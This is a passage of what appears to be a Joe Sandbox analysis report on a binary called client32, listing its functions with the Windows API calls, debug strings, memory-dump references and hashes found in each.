                                                                              Function 110812A0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 74COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _memmove.LIBCMT ref: 1108132F
                                                                              • _memset.LIBCMT ref: 11081318
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcess_memmove_memsetwsprintf
                                                                              • String ID: ..\CTL32\DataStream.cpp$IsA()$m_iPos>=nBytes$nBytes>=0$pData
                                                                              • API String ID: 75970324-4264523126
                                                                              • Opcode ID: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
                                                                              • Instruction ID: 3f790bad6e390bc8ea8a8f21c3872a9d67b2f4e4425326796fba8d3d5e2d5bab
                                                                              • Opcode Fuzzy Hash: d8c9cfc558a83648f442f3398f9905bd9548d166cd1f75af1a89d4c0a32f60db
                                                                              • Instruction Fuzzy Hash: 6B11EB7DF143126FC605DF41EC43F9AF3D4AF9064CF108039E94A27241E571B808C6A1
                                                                              Function 1103F450 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 43sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsWindow.USER32(00000000), ref: 1103F466
                                                                              • FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F47C
                                                                              • IsWindow.USER32(00000000), ref: 1103F484
                                                                              • Sleep.KERNEL32(00000014), ref: 1103F497
                                                                              • FindWindowA.USER32(PCIVideoSlave32,00000000), ref: 1103F4A7
                                                                              • IsWindow.USER32(00000000), ref: 1103F4AF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$Find$Sleep
                                                                              • String ID: PCIVideoSlave32
                                                                              • API String ID: 2137649973-2496367574
                                                                              • Opcode ID: f9403fe9dea3d152aead7fa3d2adf20292fef7f356e696344d66dd2b7210a141
                                                                              • Instruction ID: 349d86511175fe1d1df632f2bffc72f1f56a45a46628263fa2557b0125cca1c8
                                                                              • Opcode Fuzzy Hash: f9403fe9dea3d152aead7fa3d2adf20292fef7f356e696344d66dd2b7210a141
                                                                              • Instruction Fuzzy Hash: 44F0A473A4122A6EDB01EFF98DC4FA6B7D8AB84699F410074E968D7109F634E8014777
                                                                              Function 11003400 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 41windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadMenuA.USER32(00000000,00002EFF), ref: 1100340E
                                                                              • GetSubMenu.USER32(00000000,00000000), ref: 1100343A
                                                                              • GetSubMenu.USER32(00000000,00000000), ref: 1100345C
                                                                              • DestroyMenu.USER32(00000000), ref: 1100346A
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Menu$DestroyErrorExitLastLoadMessageProcesswsprintf
                                                                              • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                              • API String ID: 468487828-934300333
                                                                              • Opcode ID: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
                                                                              • Instruction ID: 1378fb0f7ab2c0978cd4d50cac7dc25882af45c4d25f08e40c7e232078aa5069
                                                                              • Opcode Fuzzy Hash: cb09c6b33aa2397f6040dc9ac8fe113c92c7d1ba2ee6536d01521099fc9f1030
                                                                              • Instruction Fuzzy Hash: B3F0E93AE9063573E25252A71C86F9FE2488B45699F500032F926BA580EA14B80043E9
                                                                              Function 11003310 Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 37windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadMenuA.USER32(00000000,00002EF9), ref: 1100331D
                                                                              • GetSubMenu.USER32(00000000,00000000), ref: 11003343
                                                                              • GetMenuItemCount.USER32(00000000), ref: 11003367
                                                                              • DestroyMenu.USER32(00000000), ref: 11003379
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Menu$CountDestroyErrorExitItemLastLoadMessageProcesswsprintf
                                                                              • String ID: ..\CTL32\annotate.cpp$hMenu$hSub
                                                                              • API String ID: 4241058051-934300333
                                                                              • Opcode ID: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
                                                                              • Instruction ID: a78e3c2f88e64c1b086a81e8c9a2b46f663d882bee818e15e56a3ec0b04889ae
                                                                              • Opcode Fuzzy Hash: 85d4a40678ea7b6d13a0383658e2681328b2af046e894752399e51aa99d6900d
                                                                              • Instruction Fuzzy Hash: AEF02E36E9093A73D25212B72C4AFCFF6584F456ADB500031F922B5645EE14A40053A9
                                                                              Function 11025712 Relevance: 12.1, APIs: 8, Instructions: 121windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowTextA.USER32(?,?,00000050), ref: 11025766
                                                                              • _strncat.LIBCMT ref: 1102577B
                                                                              • SetWindowTextA.USER32(?,?), ref: 11025788
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • GetDlgItemTextA.USER32(?,00001395,?,00000040), ref: 11025814
                                                                              • GetDlgItemTextA.USER32(?,00001397,?,00000040), ref: 11025828
                                                                              • SetDlgItemTextA.USER32(?,00001397,?), ref: 11025840
                                                                              • SetDlgItemTextA.USER32(?,00001395,?), ref: 11025852
                                                                              • SetFocus.USER32(?), ref: 11025855
                                                                                • Part of subcall function 11025260: GetDlgItem.USER32(?,?), ref: 110252B0
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Text$Item$Window$Focus_malloc_memset_strncatwsprintf
                                                                              • String ID:
                                                                              • API String ID: 3832070631-0
                                                                              • Opcode ID: 2b61e4ef957feb7ce17a8024798aa9246a1c5d1c409547fc379c5c00eb05ef8b
                                                                              • Instruction ID: bfe7d5249f4b6e1d02486e1e3511efca77028c7631b8c8a816f62769cf0b8b3d
                                                                              • Opcode Fuzzy Hash: 2b61e4ef957feb7ce17a8024798aa9246a1c5d1c409547fc379c5c00eb05ef8b
                                                                              • Instruction Fuzzy Hash: 5D41A1B1A40349ABE710DB74CC85BBAF7F8FB44714F004969E62A97680EBB4A904CB54
                                                                              Function 110EF790 Relevance: 12.1, APIs: 8, Instructions: 84filememoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetFileSize.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,111323D6,00000000,?), ref: 110EF7A8
                                                                              • ReadFile.KERNEL32(00000000,00000000,0000000E,?,00000000,?,111323D6,00000000,?), ref: 110EF7BD
                                                                              • GlobalAlloc.KERNEL32(00000042,-0000000E,00000000), ref: 110EF7DF
                                                                              • GlobalLock.KERNEL32(00000000), ref: 110EF7EC
                                                                              • ReadFile.KERNEL32(00000000,00000000,-0000000E,0000000E,00000000), ref: 110EF7FB
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 110EF80B
                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 110EF825
                                                                              • GlobalFree.KERNEL32(00000000), ref: 110EF82C
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Global$File$ReadUnlock$AllocFreeLockSize
                                                                              • String ID:
                                                                              • API String ID: 3489003387-0
                                                                              • Opcode ID: dd8f80031ae181a8ed5eea704e92fea1ffadc77db63c751e718b3c2d07927bee
                                                                              • Instruction ID: 752bd59a7f8b278135cd4218b820f19d57544efb101fbb4cfc0774b0aabdd1bf
                                                                              • Opcode Fuzzy Hash: dd8f80031ae181a8ed5eea704e92fea1ffadc77db63c751e718b3c2d07927bee
                                                                              • Instruction Fuzzy Hash: 3721C532A41019AFD704DFA5CA89AFEB7FCEB4421AF0001AEF91997540DF709901C7E2
                                                                              Function 11089950 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 228COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 11088C40: IsWindow.USER32(?), ref: 11088C5F
                                                                                • Part of subcall function 11088C40: IsWindow.USER32(?), ref: 11088C6D
                                                                              • GetParent.USER32(00000000), ref: 11089996
                                                                              • GetParent.USER32(00000000), ref: 110899A7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ParentWindow
                                                                              • String ID: .chm$.hlp$WinHelp cmd=%d, id=%d, file=%s$debughlp.$$$
                                                                              • API String ID: 3530579756-3361795001
                                                                              • Opcode ID: 434b2cb741835ac03b002844321d47e96989c184908e24c31a4124005bd277de
                                                                              • Instruction ID: dcd0680657676d00064f31b5da51888b306acc0f32f54203c3ee3b251bcfdaac
                                                                              • Opcode Fuzzy Hash: 434b2cb741835ac03b002844321d47e96989c184908e24c31a4124005bd277de
                                                                              • Instruction Fuzzy Hash: F5712774E0426AAFDB11DFA4DD81FEFB7E8EF85308F4040A5E909A7241E771A944CB91
                                                                              Function 1101B530 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 204libraryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 110DEB60: EnterCriticalSection.KERNEL32(111EE0A4,11018BE8,EE49F673,?,?,?,111CD988,11187878,000000FF,?,1101ABB2), ref: 110DEB61
                                                                                • Part of subcall function 111101B0: _malloc.LIBCMT ref: 111101C9
                                                                                • Part of subcall function 111101B0: wsprintfA.USER32 ref: 111101E4
                                                                                • Part of subcall function 111101B0: _memset.LIBCMT ref: 11110207
                                                                              • std::exception::exception.LIBCMT ref: 1101B776
                                                                              • __CxxThrowException@8.LIBCMT ref: 1101B791
                                                                              • LoadLibraryA.KERNEL32(NSSecurity.dll,00000000,111CD988), ref: 1101B7AE
                                                                                • Part of subcall function 11008DD0: std::_Xinvalid_argument.LIBCPMT ref: 11008DEA
                                                                              Strings
                                                                              • NsAppSystem Info : Control Channel Command Sent : %d, xrefs: 1101B70A
                                                                              • NSSecurity.dll, xrefs: 1101B7A3
                                                                              • NsAppSystem Info : Control Channel Sending Command : %d, xrefs: 1101B6E9
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalEnterException@8LibraryLoadSectionThrowXinvalid_argument_malloc_memsetstd::_std::exception::exceptionwsprintf
                                                                              • String ID: NSSecurity.dll$NsAppSystem Info : Control Channel Command Sent : %d$NsAppSystem Info : Control Channel Sending Command : %d
                                                                              • API String ID: 3515807602-1044166025
                                                                              • Opcode ID: 516f949d8a8a1383b1a24131f20d62a9ee5b2450b9431babf89fa67383d09024
                                                                              • Instruction ID: 97a0dec6d0d64d3c3877ebf05293913b11e378911f3366e288316342895a3808
                                                                              • Opcode Fuzzy Hash: 516f949d8a8a1383b1a24131f20d62a9ee5b2450b9431babf89fa67383d09024
                                                                              • Instruction Fuzzy Hash: 72718FB5D00309DFEB10CFA4C844BDDFBB4AF19318F244569E915AB381DB79AA44CB91
                                                                              Function 110717D0 Relevance: 10.7, APIs: 3, Strings: 4, Instructions: 176COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • EnterCriticalSection.KERNEL32(?,EE49F673,75A77CB0,75A77AA0,?,75A77CB0,75A77AA0), ref: 11071824
                                                                              • LeaveCriticalSection.KERNEL32(?), ref: 11071838
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • LeaveCriticalSection.KERNEL32(00000000,?,?), ref: 110719B1
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CriticalSection$Leave$EnterErrorExitLastMessageProcesswsprintf
                                                                              • String ID: ..\ctl32\Connect.cpp$Register NC_CHATEX for conn=%s, q=%p$queue$r->queue != queue
                                                                              • API String ID: 624642848-3840833929
                                                                              • Opcode ID: 3c83a621861238185e4c263f1509ae9a5f7840be0cd4825615d113d4d233f835
                                                                              • Instruction ID: 4c47afc427fc1e2a273e18b082198136771a32f8cb6ee563f570ada24247464b
                                                                              • Opcode Fuzzy Hash: 3c83a621861238185e4c263f1509ae9a5f7840be0cd4825615d113d4d233f835
                                                                              • Instruction Fuzzy Hash: 9B611475E04285AFE701CF64C480FAABBF6FB05314F0485A9E8959B2C1E774E985CBA4
                                                                              Function 110935A0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 108COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 110CEEB0: CreateDialogParamA.USER32(00000000,?,1112E709,110CC170,00000000), ref: 110CEF41
                                                                                • Part of subcall function 110CEEB0: GetLastError.KERNEL32 ref: 110CF099
                                                                                • Part of subcall function 110CEEB0: wsprintfA.USER32 ref: 110CF0C8
                                                                                • Part of subcall function 111439A0: _memset.LIBCMT ref: 111439C9
                                                                                • Part of subcall function 111439A0: GetVersionExA.KERNEL32(?), ref: 111439E2
                                                                              • GetWindowLongA.USER32(?,000000EC), ref: 110935E9
                                                                              • SetWindowLongA.USER32(?,000000EC,00000000), ref: 11093617
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              • GetWindowLongA.USER32(?,000000F0), ref: 11093640
                                                                              • SetWindowLongA.USER32(?,000000F0,00000000), ref: 1109366E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
